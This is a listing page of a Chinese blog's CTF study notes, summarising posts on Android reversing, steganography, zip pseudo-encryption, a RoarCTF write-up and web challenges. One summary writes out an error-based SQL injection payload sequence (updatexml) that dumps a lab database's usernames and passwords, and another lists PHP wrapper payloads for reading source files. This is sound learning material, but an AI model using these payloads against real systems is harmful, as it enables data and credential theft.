摘要: 这似乎是一道安卓逆向题??我就是没有搞懂安卓逆向原来是misc吗... 安卓逆向一个例子 #工具准备 1.apktool——可以反编译软件的布局文件、图片等资源,方便大家学习一些很好的布局; 2.dex2jar——将apk反编译成java源码(classes.dex转化成jar文件); 3.jd-g 阅读全文
posted @ 2020-08-07 11:45 云千 阅读(1277) 评论(0) 推荐(0) 编辑
摘要: aaencode:http://www.atoolbox.net/Tool.php?Id=703 颜文字加密 阅读全文
posted @ 2020-07-24 20:10 云千 阅读(3562) 评论(0) 推荐(0) 编辑
摘要: 注入点在cookie; 工具:火狐插件:Edit This Cookie 阅读全文
posted @ 2020-07-23 18:48 云千 阅读(561) 评论(0) 推荐(0) 编辑
摘要: session.auto_start=0 修改为 session.auto_start=1; output_buffering = Off 修改为 output_buffering = On; 阅读全文
posted @ 2020-07-23 14:57 云千 阅读(354) 评论(0) 推荐(0) 编辑
摘要: updatexml(1,concat(0x7e,(select database()),0x7e),1) updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) updatexml(1,concat(0x7e,(select group_concat( column_name ) from information_schema.columns where table_name='users'),0x7e),1) updatexml(1,concat(0x7e,(select substr((select group_concat(id,0x3a,username,0x3a,password) from security.users),1,20)),0x7e),1) 阅读全文
posted @ 2020-07-22 18:11 云千 阅读(157) 评论(0) 推荐(0) 编辑
摘要: 知识点 1.data://text/plain;base64,数据(base64加密后) 2.php://filter/read=convert.base64-encode/resource=文件名 阅读全文
posted @ 2020-07-16 15:59 云千 阅读(396) 评论(0) 推荐(1) 编辑
摘要: [RoarCTF 2019]Easy Calc #题目 题目打开是这样的 查看源码 .ajax是指通过http请求加载远程数据。 可以发现有一个calc.php,输入的算式会被传入到这个php文件里,尝试一下能不能打开 可以打开,并且显示了源码 foreach 语法结构提供了遍历数组的简单方式。 语 阅读全文
posted @ 2020-07-15 16:37 云千 阅读(1179) 评论(0) 推荐(0) 编辑
摘要: #0x01 知识点 伪加密 steghide提取信息 #0x02 伪加密的判断 首先,在winhex分析,发现有4个zip文件的文件头和2个文件尾,有完整文件头尾那么可以直接修改后缀为zip解压, 查看一下压缩包里的文件,发现有加密,继续分析zip的部分 我们仔细看一下这一部分,会发现存在一个伪加密 阅读全文
posted @ 2020-07-14 11:36 云千 阅读(4426) 评论(0) 推荐(0) 编辑
摘要: 题目:bugku Misc论剑 第一步:在winhex里分析 发现文件头有两个 两个jpg文件中间还有一段二进制码 在kali里分离出两个一样jpg图片,但是没有什么发现 二进制码解出来也没有flag 然后就没有了思路。。。 找到网上的wp做了一遍,收获很多 修改jpg的宽高:FF C2 XX XX 阅读全文
posted @ 2020-07-03 13:41 云千 阅读(546) 评论(0) 推荐(0) 编辑
摘要: 点击劫持的小实验 阅读全文
posted @ 2020-06-28 16:25 云千 阅读(1812) 评论(0) 推荐(0) 编辑